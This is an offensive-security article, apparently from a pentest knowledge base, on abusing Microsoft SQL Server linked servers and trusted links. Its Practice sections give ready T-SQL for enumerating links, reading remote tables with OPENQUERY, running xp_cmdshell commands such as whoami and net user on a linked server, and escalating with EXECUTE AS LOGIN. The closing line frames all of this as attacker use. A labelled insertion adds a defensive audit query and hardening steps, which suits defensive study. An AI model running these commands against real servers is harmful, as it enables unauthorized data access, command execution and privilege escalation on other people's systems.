MSSQL Trusted Links

Context

This article explores the exploitation of MSSQL Trusted Links for unauthorized data access and potential command execution. The reader is assumed to have knowledge of SQL Server architecture, the configuration of linked servers, and SQL query execution.

Theory

Linked Servers in MSSQL

Linked servers in Microsoft SQL Server allow an instance to interact with data sources beyond its boundaries through its support for OLE DB. This functionality facilitates seamless cross-database queries and operations, allowing different databases to communicate and exchange data efficiently.

MSSQL Trusted Links rest on the assumption that the communicating SQL Server instances inherently trust each other. If these links are misconfigured, they can let attackers bypass standard authentication and gain unauthorized access to data on the remote instance.

Security Context Impersonation

Security context impersonation is a feature by which SQL Server assumes the identity of a trusted connection's security context. When mismanaged, it can be abused to escalate privileges, giving attackers access to sensitive data and operations that would otherwise be restricted.

Cross-Database Access via Linked Servers

A fundamental attack sequence uses a linked server to execute queries or commands on a remote database. The main weakness lies in the lack of stringent access controls on the link itself, which often leads to unauthorized data access when the link is improperly configured.

Practice

  • Identify Linked Servers:
    Use the master..sysservers table to identify all the linked servers configured in the target SQL Server instance.

    SELECT * FROM master..sysservers;
    
  • List Linked Servers:
    Employ the stored procedure sp_linkedservers to enumerate all linked servers, helping identify potential targets.

    EXEC sp_linkedservers;
    
  • Access Data from Linked Server:
    Retrieve information from a database within a linked server using OPENQUERY. This allows data access without having direct permissions on the target server.

    SELECT * FROM OPENQUERY([LinkedServerName], 'SELECT * FROM target_db.dbo.target_table');
    
  • Execute Commands on Linked Server:
    Use xp_cmdshell to run commands, such as whoami, on the linked server to confirm access levels or gather more information.

    EXEC('xp_cmdshell ''whoami''') AT [LinkedServerName];

Outcome: This technique enables unauthorized access to data hosted on linked servers, bypassing direct permissions.

Privilege Escalation via Security Context Impersonation

  • Impersonate a Higher Privilege Login:
    Leverage EXECUTE AS LOGIN to impersonate a login with elevated privileges.

    EXECUTE AS LOGIN = 'linked_server_login';
    
  • Access Data Using Impersonation:
    Through impersonation, query sensitive data from the linked server.

    SELECT * FROM OPENQUERY([LinkedServerName], 'SELECT * FROM sensitive_db.dbo.sensitive_table');
    
  • Execute Privileged Commands:
    Utilize xp_cmdshell to execute privileged commands, such as checking user accounts, on the linked server under the impersonated security context.

    EXEC('xp_cmdshell ''net user''') AT [LinkedServerName];

Outcome: This approach results in privilege escalation, enabling the attacker to perform tasks beyond their original access level using impersonated privileges.
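As an added example, not part of the original article, the following T-SQL audits the linked-server login mappings and server options that both procedures above depend on, and shows the corresponding hardening; the server and login names are constructed placeholders.

```sql
-- Audit every linked server with its login mappings (constructed example).
-- local_principal_id = 0 in sys.linked_logins is the default mapping that
-- applies to all logins not listed explicitly.
SELECT
    s.name                                 AS linked_server,
    s.product,
    s.data_source,
    s.is_rpc_out_enabled,                  -- needed for EXEC(...) AT [server]
    s.is_data_access_enabled,              -- needed for OPENQUERY / four-part names
    ISNULL(p.name, N'<all other logins>')  AS local_login,
    l.uses_self_credential,                -- 1 = forward the caller's own context
    l.remote_name,                         -- fixed remote login stored on this instance
    CASE
        WHEN l.uses_self_credential = 0 AND l.remote_name IS NOT NULL
             AND s.is_rpc_out_enabled = 1
            THEN N'REVIEW: stored remote credential plus RPC Out lets any mapped login run EXEC ... AT as the remote login'
        WHEN l.uses_self_credential = 0 AND l.remote_name IS NOT NULL
            THEN N'REVIEW: stored remote credential; confirm the remote login is not sysadmin'
        ELSE N'ok'
    END AS finding
FROM sys.servers AS s
LEFT JOIN sys.linked_logins     AS l ON l.server_id = s.server_id
LEFT JOIN sys.server_principals AS p ON p.principal_id = l.local_principal_id
WHERE s.is_linked = 1
ORDER BY s.name, local_login;

-- Run this on each instance reachable through a link: value_in_use = 1 means
-- EXEC('xp_cmdshell ...') AT [server] can reach the operating system there.
SELECT name, value_in_use FROM sys.configurations WHERE name = N'xp_cmdshell';

-- Hardening for a link that only needs read access (placeholder names):
-- 1. Disable RPC Out so EXEC ... AT is refused on this link.
EXEC sp_serveroption @server = N'LinkedServerName', @optname = N'rpc out', @optvalue = N'false';
-- 2. Replace the default mapping with a least-privilege remote login instead of sysadmin.
EXEC sp_droplinkedsrvlogin @rmtsrvname = N'LinkedServerName', @locallogin = NULL;
EXEC sp_addlinkedsrvlogin  @rmtsrvname = N'LinkedServerName', @useself = N'false',
                           @locallogin = NULL, @rmtuser = N'link_reader',
                           @rmtpassword = N'<strong password>';
```

Rows flagged REVIEW are the mappings the two procedures above rely on; re-run the audit after hardening to confirm the finding column reads ok.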

Tools

  • SQL Server Management Studio
  • sqlcmd

By following the above techniques, an attacker can exploit trust relationships between linked MSSQL servers to execute unauthorized commands, access sensitive data, and elevate their privileges within the network.
